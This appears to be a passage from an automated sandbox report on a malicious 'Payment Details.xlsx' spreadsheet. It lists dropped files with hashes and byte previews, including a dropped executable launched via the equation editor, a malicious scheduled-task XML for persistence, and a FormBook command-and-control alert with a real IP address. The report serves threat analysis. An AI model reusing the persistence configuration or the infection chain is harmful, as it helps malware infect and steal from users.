                                    Preview: .PNG........IHDR.............L.!... .IDATx..g.].y&X'...{;.t@F. .. .D*Q.eI..#[.5~lK3...z.3.gw...^.=;.FV..%..d..%R..E......F.ts<..X..f..F..5|..s..:Uu.W.U....!.9...A..u/...g.w......lx...pG..2..x..w..!...w.pG..2..x..w..!.....m.a>.....R........x.IU[.A.....].Y.L..!....|AQ.h4....x..\6....|.i..]..Q..(...C..A..Z... (j.f4..u=..o.D.oj....y6......)I.......G.{zn.M,...?#..,...|....y....G.LOO..?.....7..-.>.._.m[.........q.O}..G....?....h4.=t..c...eY.........3g..|0...x...|..../F....o.._|...?.O..........c..x._..7vF..0.....B>.....}{..V....P(.....c.....4...s...K.K."c(.....}.0......._z...}..y<<.......<..^.7....k.r.W~..c._.....$J....:.w._~.........._..Wp.....q........G..vA.D.E......"...?...'....}nvv....^.^.42..f....Q(..$...`(vidd..8......y.Z{...L.~...k....z....@@0...Bk..?.r..7...9u...w.>w.C..j.n..a..V.?..?...es#.G...l.&I..)..).J..>...+Mn.^.W.._....D...".}..k......8.N_.v..>.y.@0..,/.........>.a...........z.].../.r .........../3.....?.z..g.Z.....l0.L.S....._../.r
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B38F263E.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                    Category:dropped
                                    Size (bytes):19408
                                    Entropy (8bit):7.931403681362504
                                    Encrypted:false
                                    SSDEEP:384:6L3Vdo4yxL8FNgQ9jYtUO5Zn4tIlQ1Yes7D6PhbXngFfZdQTEfn4n6EVPBo6a:2exL8rgQ2tVF4GlQUuZXnYfTs6EJiL
                                    MD5:63ED10C9DF764CF12C64E6A9A2353D7D
                                    SHA1:608BE0D9462016EA4F05509704CE85F3DDC50E63
                                    SHA-256:4DAC3676FAA787C28DFA72B80FE542BF7BE86AAD31243F63E78386BC5F0746B3
                                    SHA-512:9C633C57445D67504E5C6FE4EA0CD84FFCFECFF19698590CA1C4467944CD69B7E7040551A0328F33175A1C698763A47757FD625DA7EF01A98CF6C585D439B4A7
                                    Malicious:false
                                    Preview: .PNG........IHDR.............L.!... .IDATx..g.].y&X'...{;.t@F. .. .D*Q.eI..#[.5~lK3...z.3.gw...^.=;.FV..%..d..%R..E......F.ts<..X..f..F..5|..s..:Uu.W.U....!.9...A..u/...g.w......lx...pG..2..x..w..!...w.pG..2..x..w..!.....m.a>.....R........x.IU[.A.....].Y.L..!....|AQ.h4....x..\6....|.i..]..Q..(...C..A..Z... (j.f4..u=..o.D.oj....y6......)I.......G.{zn.M,...?#..,...|....y....G.LOO..?.....7..-.>.._.m[.........q.O}..G....?....h4.=t..c...eY.........3g..|0...x...|..../F....o.._|...?.O..........c..x._..7vF..0.....B>.....}{..V....P(.....c.....4...s...K.K."c(.....}.0......._z...}..y<<.......<..^.7....k.r.W~..c._.....$J....:.w._~.........._..Wp.....q........G..vA.D.E......"...?...'....}nvv....^.^.42..f....Q(..$...`(vidd..8......y.Z{...L.~...k....z....@@0...Bk..?.r..7...9u...w.>w.C..j.n..a..V.?..?...es#.G...l.&I..)..).J..>...+Mn.^.W.._....D...".}..k......8.N_.v..>.y.@0..,/.........>.a...........z.].../.r .........../3.....?.z..g.Z.....l0.L.S....._../.r
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B76C8963.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                    Category:dropped
                                    Size (bytes):68702
                                    Entropy (8bit):7.960564589117156
                                    Encrypted:false
                                    SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                    MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                    SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                    SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                    SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                    Malicious:false
                                    Preview: .PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.*Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y..*.v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..|..8...
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E38FA527.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                    Category:dropped
                                    Size (bytes):11303
                                    Entropy (8bit):7.909402464702408
                                    Encrypted:false
                                    SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                    MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                    SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                    SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                    SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                    Malicious:false
                                    Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E77F686A.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 600 x 306, 8-bit colormap, non-interlaced
                                    Category:dropped
                                    Size (bytes):42465
                                    Entropy (8bit):7.979580180885764
                                    Encrypted:false
                                    SSDEEP:768:MUC94KctLo6+FkVfaapdydSo7CT3afPFUaV8v9TIzsrZsQ54kvd8gjDsss2Ur6:MJctLo63a8dydV+3WOa+90sZsSyMs+
                                    MD5:C31D090D0B6B5BCA539D0E9DB0C57026
                                    SHA1:D00CEE7AEE3C98505CDF6A17AF0CE28F2C829886
                                    SHA-256:687AFECEE6E6E286714FD267E0F6AC74BCA9AC6469F4983C3EF7168C65182C8D
                                    SHA-512:B23CA96097C2F5ED8CC251C0D6A34F643EE2251FDF3DEF6A962A168D82385CFEE2328D39FF86AADEA5EDBBF4D35882E6CD9CF8ECE43A82BD8F06383876B24756
                                    Malicious:false
                                    Preview: .PNG........IHDR...X...2......?^O..._PLTE.......................................................................gbh................j...^k....-.........................................>Jg......h..m.............l`.......qjG.9\LC..........u.*.'.................//F.......h.++..j...e....A.H?>.......|DG...........G./.`<..G...O:R..j...................................................tRNS.@..f...0IDATx..Z.s.4.]:.".F..Y.5.4!...WhiM..]Cv.Q......e.....x....~...x.g.%K.....X.....brG..sW:~g.Tu...U.R...W.V.U#TAr?..?}.C3.K...P..n..A..av?C..J.}.e.]...CA._y......~.2.^..Z..'...@......)....s.(...ey......{.)e..*]\-..yG2Ne.B....\@q....8.....W./i.C..P.*...O..e..7./..k:..t....]"../...F......y.......0`.3..g.)..Z...tR.bU.].B.Y...Ri^.R......D.*........=(tL.W.y....n.\.s..D.5.....c....8A....:;.)..].a]...;B0...B.0&@*.+..2..4....-X.>)..h~.J..".nO=VV.t...q..5......f.h......DPyJ*....E..:.....K.... ......E.%i..C..V..\.......z.^.r7.V...q.`....3..E3J8Ct.Z.l.GI.).R!b
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EAE7ECFC.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 338 x 143, 8-bit/color RGBA, non-interlaced
                                    Category:dropped
                                    Size (bytes):6364
                                    Entropy (8bit):7.935202367366306
                                    Encrypted:false
                                    SSDEEP:192:joXTTTt+cmcZjbF/z2sA9edfxFHTeDELxExDR:joXTTTEc5ZjR/zI9EfjTeDEGxDR
                                    MD5:A7E2241249BDCC0CE1FAAF9F4D5C32AF
                                    SHA1:3125EA93A379A846B0D414B42975AADB72290EB4
                                    SHA-256:EC022F14C178543347B5F2A31A0BFB8393C6F73C44F0C8B8D19042837D370794
                                    SHA-512:A5A49B2379DF51DF5164315029A74EE41A2D06377AA77D24A24D6ADAFD3721D1B24E5BCCAC72277BF273950905FD27322DBB42FEDA401CA41DD522D0AA30413C
                                    Malicious:false
                                    Preview: .PNG........IHDR...R...........S.....sRGB.........gAMA......a.....pHYs..........o.d...!tEXtCreation Time.2018:08:27 10:23:35Z......DIDATx^....M......3c0f0.2.9o.......-..r..:.V*.ty..MEJ.^.$G.T.AJ.J.n.....0.`...B...g=....{..5.1...|.g.z..Y.._...3k..y............@JD...)..KQ.........f.DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.....9.sdKv.\.R[...k...E..3....ee.!..Wl...E&6.\.]..'K...x.O..%.EE..'...}..[c....?n..R...V..U5!.Rt...-xw*.....#..._....I....k.!":...H.....eKN.....9....{%......*7..6Y..".....P....."ybQ.....JJ`z..%..a.$<m.n'..[.f0~..r.........-.q...{.Mu3.yX...\...5.a.zNX.9..-.[......QU.r .qZ...&.{....$..`.Lu..]Z^'.].k|.z.3....H.../...k7.1>y.D..._x...........=.u.?ee.9.'.11:={.t]....)..k...F@P|f....9...K>...{...}...h9.b..h....w.....A~...u..j.9..x..C=.JJ.h....K2.... .../I..=3C.6k.]...JD.....:tP.e...-+*...}..\.Yrss4...i.f..A7I...u.M....v.uY_.V|.].-Oo..........._.;@c....`.....|.R7>^...j*S...{...w.iV..UR..SJ.hy.W3...2Q@f......,.....
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9EB6C08.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                    Category:dropped
                                    Size (bytes):14828
                                    Entropy (8bit):7.9434227607871355
                                    Encrypted:false
                                    SSDEEP:384:zIZYVvfv3ZOxvHe5EmlbliA2r1BMWWTXRRO/QX:Td3Z46xiXzW/kO
                                    MD5:58DD6AF7C438B638A88D107CC87009C7
                                    SHA1:F25E7F2F240DC924A7B48538164A5B3A54E91AC6
                                    SHA-256:9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
                                    SHA-512:C1A3543F221FE7C2B52C84F6A12607AF6DAEF60CCB1476D6D3E957A196E577220801194CABC18D6A9A8269004B732F60E1B227C789A9E95057F282A54DBFC807
                                    Malicious:false
                                    Preview: .PNG........IHDR.............L.!... .IDATx..gp\.y>~v...WTb... ...!.M.H...d.J..3.8.(.L&.lM.d.o..$..q.D.I.....k,J.b3%QD!.Bt,.........p.+.....x?`....{.9o..W.q.Y.gM.g=.5"dm.V..M...iX..6....g=.R(..N'.0&.I(..B2..\...|.t......R.T.......J...Q.U....F.I..B.\...B.Z-....D")..,.J.....u..1.#....A.P.i..!...3.U1....RI..9....:..~..r..N.....Je,...l...(..CCC...v....a.l6KQ...ooo...d.fxx...k``...5.N.\.S.N...e2............b..7..8@.tgg.}..Ue7..e.G .`.J.d2)..B!M..r..T*Q.%..X.......{....,.q.\,.E".........z..*.abbB*...j.\.J.(.b.......|>...........R....L&..X.eYV"..-.R)B.T*M&..pX*.j.Z..9..F.Z.6....b.\./%..~...).B<..T*.z..D"..(...\...d2YKKK...mm.T*..l.T*..I$.x<..J..q..*.J .X..O>...C.d2.JI...:...#....xkk.B.(....D .8..t:..o>...:vC%MNNj.ZHZ....`.T....,...A.....l$.q.\f.....eY..8.+....`dd.b.X,.BH.T..4-..x.EV.|&.p.......O.P(.J.\>66.a.X,...><<....V.R.T*....d2.;v.....W.511.u.a....'..'...zkk.m.t:]__...ggg.o.............Y..z..a.....{..%.H..f...nw*..........'ND"...P(D"... .H..|>/.Hd2....EQ.
                                    C:\Users\user\AppData\Local\Temp\tmpC92A.tmp
                                    Process:C:\Users\Public\vbc.exe
                                    File Type:XML 1.0 document, ASCII text
                                    Category:dropped
                                    Size (bytes):1578
                                    Entropy (8bit):5.108460768399864
                                    Encrypted:false
                                    SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtwxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTAv
                                    MD5:5A018129C464113B52BC5573A3B1B93C
                                    SHA1:6F17FA4E34555C3A38D4BCED9FFFFE97C14FF7B0
                                    SHA-256:3DD3408806D339789B8AB7878072025238D4DAD182810DDEBC19CA68569B57E8
                                    SHA-512:B12739C10849BDEE9387E06B943592C2CF6E0A41C88EE1134FD6A3CAA3547CDACE0C7CDB36C3C1A7328BF4418FDB850B0262A09EDA20474DC3264A69998BEA6C
                                    Malicious:true
                                    Preview: <?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                    C:\Users\user\AppData\Local\Temp\~DF0437710B50B493BA.TMP
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):512
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3::
                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                    Malicious:false
                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    C:\Users\user\AppData\Local\Temp\~DF8260883CA3EB749E.TMP
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:CDFV2 Encrypted
                                    Category:dropped
                                    Size (bytes):234600
                                    Entropy (8bit):7.971193076260305
                                    Encrypted:false
                                    SSDEEP:6144:HkrpOY+fhX0Iop0jRpwyDczCg7DZ1PBxdTiRLbqO7:HkrpOJhDo0j7wywzj7DD5/TabT
                                    MD5:F49E322B837835AC60CAD8C173ECFF31
                                    SHA1:C7CDDFBF865B528D1BBBBE5C5F3974279CC8B6F5
                                    SHA-256:FF4E17D62CE9C71164879418E7942CECF8DB37B16CB66ADEBC6C2570840F8524
                                    SHA-512:C5CE7FEB4A44D0A3C0BA17C1104D599409C66C1A36E68F382DF9048E18F02349C16CF4DE21437F988E4779CE56847B9574DD83562DD1239BC88358922E2826B9
                                    Malicious:false
                                    Preview: ......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                    C:\Users\user\AppData\Local\Temp\~DF9A98EC95844A9751.TMP
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):512
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3::
                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                    Malicious:false
                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    C:\Users\user\AppData\Local\Temp\~DFBA44D8F3B40A3F94.TMP
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):512
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3::
                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                    Malicious:false
                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\R7HWQA7HZJYT21Z3G4UU.temp
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8016
                                    Entropy (8bit):3.5846139722878556
                                    Encrypted:false
                                    SSDEEP:96:chQC4MqGqvsqvJCwoBz8hQC4MqGqvsEHyqvJCwor/ztAKrVHypxpyX3lUVLA2:cm7oBz8mvHnor/zt58f8X4A2
                                    MD5:247B62A1E21D993F810B83CF19997157
                                    SHA1:43974401B3DA0E188A101465DC510105D64D7222
                                    SHA-256:A95B81263776693FAAA622A07365AE7FB40F60FE6F0E30E71F1C790AC25B6D8D
                                    SHA-512:B32597386AE62602BCAC5BE6A20FC3731814D8F96D2BF1351D746F0BDC7372CBB49C42A86C59D7E1CAF3AB21F1232FE3E555EE7BC88D1BE8B94355ADAC6EB9D9
                                    Malicious:false
                                    Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S .*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8016
                                    Entropy (8bit):3.5846139722878556
                                    Encrypted:false
                                    SSDEEP:96:chQC4MqGqvsqvJCwoBz8hQC4MqGqvsEHyqvJCwor/ztAKrVHypxpyX3lUVLA2:cm7oBz8mvHnor/zt58f8X4A2
                                    MD5:247B62A1E21D993F810B83CF19997157
                                    SHA1:43974401B3DA0E188A101465DC510105D64D7222
                                    SHA-256:A95B81263776693FAAA622A07365AE7FB40F60FE6F0E30E71F1C790AC25B6D8D
                                    SHA-512:B32597386AE62602BCAC5BE6A20FC3731814D8F96D2BF1351D746F0BDC7372CBB49C42A86C59D7E1CAF3AB21F1232FE3E555EE7BC88D1BE8B94355ADAC6EB9D9
                                    Malicious:false
                                    Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S .*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                    C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe
                                    Process:C:\Users\Public\vbc.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):723456
                                    Entropy (8bit):7.763310640308659
                                    Encrypted:false
                                    SSDEEP:12288:EBzcmhiTIqqxiWT/niO1/pFbHfi17evEf6BFMmEJWixDw/1LgyHixBFmRq:EBomhikV4WzNpFDfi1gqmwK1syHi1Wq
                                    MD5:0F88779E9500075DE85E916637305164
                                    SHA1:EE1B3AF259E9F03239441681F00AADDD28E4E8FB
                                    SHA-256:C98EAC88F8F4243D7303B806CB58E0A89E33270CB4B33457C91938A2B2746238
                                    SHA-512:ADEFEE155A0579DA0DC75E4AFF162635338150A884DDDDF47C732A67D69E2F56471CDDD64A7CFFB743DEFC040185CE146B713C6511B3DAC709D4956E2D30EA31
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 50%
                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..a..............0.............~.... ... ....@.. .......................`............@.................................,...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................`.......H........H...!..........\j...............................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........
                                    C:\Users\user\Desktop\~$Payment Details.xlsx
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):165
                                    Entropy (8bit):1.4377382811115937
                                    Encrypted:false
                                    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                    MD5:797869BB881CFBCDAC2064F92B26E46F
                                    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                    Malicious:true
                                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    C:\Users\Public\vbc.exe
                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):723456
                                    Entropy (8bit):7.763310640308659
                                    Encrypted:false
                                    SSDEEP:12288:EBzcmhiTIqqxiWT/niO1/pFbHfi17evEf6BFMmEJWixDw/1LgyHixBFmRq:EBomhikV4WzNpFDfi1gqmwK1syHi1Wq
                                    MD5:0F88779E9500075DE85E916637305164
                                    SHA1:EE1B3AF259E9F03239441681F00AADDD28E4E8FB
                                    SHA-256:C98EAC88F8F4243D7303B806CB58E0A89E33270CB4B33457C91938A2B2746238
                                    SHA-512:ADEFEE155A0579DA0DC75E4AFF162635338150A884DDDDF47C732A67D69E2F56471CDDD64A7CFFB743DEFC040185CE146B713C6511B3DAC709D4956E2D30EA31
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 50%
                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..a..............0.............~.... ... ....@.. .......................`............@.................................,...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................`.......H........H...!..........\j...............................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........

                                    Static File Info

                                    General

                                    File type:CDFV2 Encrypted
                                    Entropy (8bit):7.971193076260305
                                    TrID:
                                    • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                    File name:Payment Details.xlsx
                                    File size:234600
                                    MD5:f49e322b837835ac60cad8c173ecff31
                                    SHA1:c7cddfbf865b528d1bbbbe5c5f3974279cc8b6f5
                                    SHA256:ff4e17d62ce9c71164879418e7942cecf8db37b16cb66adebc6c2570840f8524
                                    SHA512:c5ce7feb4a44d0a3c0ba17c1104d599409c66c1a36e68f382df9048e18f02349c16cf4de21437f988e4779ce56847b9574dd83562dd1239bc88358922e2826b9
                                    SSDEEP:6144:HkrpOY+fhX0Iop0jRpwyDczCg7DZ1PBxdTiRLbqO7:HkrpOJhDo0j7wywzj7DD5/TabT
                                    File Content Preview:........................>......................................................................................................................................................................................................................................

                                    File Icon

                                    Icon Hash:e4e2aa8aa4b4bcb4

                                    Network Behavior

                                    Snort IDS Alerts

                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                    11/25/21-19:30:53.961180TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.2252.128.23.153
